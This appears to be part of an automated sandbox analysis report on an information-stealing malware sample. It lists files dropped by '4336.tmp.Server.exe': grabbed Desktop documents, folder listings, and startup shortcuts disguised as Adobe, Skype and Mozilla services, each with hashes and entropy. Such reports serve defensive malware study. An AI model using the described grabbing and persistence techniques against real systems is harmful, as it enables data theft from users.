SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Reputation:	unknown
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	180
Entropy (8bit):	4.5224726418616354
Encrypted:	false
SSDEEP:	3:jgBLKeUWCgovXAsHL4/ovXASt0dAgovXAgH+t4/ovXAg+LNL0ovXA+OcwKovn:j4LKdsovXAsr4/ovXA/d/ovXAgeIovXR
MD5:	2BF23DFFD4049B0B64D28F7FC1A78C81
SHA1:	36741B2AED9716DEB9E134102496A972E88101D2
SHA-256:	579028C4D5F59005F70DE46A4BF93790145FC6EED73CF4EB12549D0004F08227
SHA-512:	37E2B67F31946567FF2E31EB8E401E1C1A16EAC5C8BED0A097B5FF2653D18358CA019E052BD4758501F326B87352D91B5BB315F1E9DD1CCB4375829DCFEDEE4E
Malicious:	false
Reputation:	unknown
Preview:	Startup\...desktop.ini...psvhost.exe.lnk...Service_Adobe.exe.lnk...Service_com.adobe.dunamis.exe.lnk...Service_Microsoft.exe.lnk...Service_Mozilla.exe.lnk...Service_Skype.exe.lnk..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4570
Entropy (8bit):	5.351072362013411
Encrypted:	false
SSDEEP:	96:4jzcRPTmt6qESfsNwThEfY0Vr6ZxqdhewmbIGVpN7lIdkDU9mC6BlOdswiNI00bi:BtbSkdr6ZoTYUKIq
MD5:	974402A95AB98D86018E4C2EA60AE153
SHA1:	8CFB565C19C609D9607F5625483DE2C631FF00A8
SHA-256:	D5D957F49B767A1E30A20DA5261C97C8E50105D69DAA66C18B011B3BBC2BEFD4
SHA-512:	C84EFC89E90926630DB77585F4D35424638D54C63DCD8DE9614CACA61C1B27389B972F06CED8AECD797D537EA060DD0AD4CC09446B4ED36743B91F9DCCB0ADF3
Malicious:	false
Reputation:	unknown
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Reputation:	unknown
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	true
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
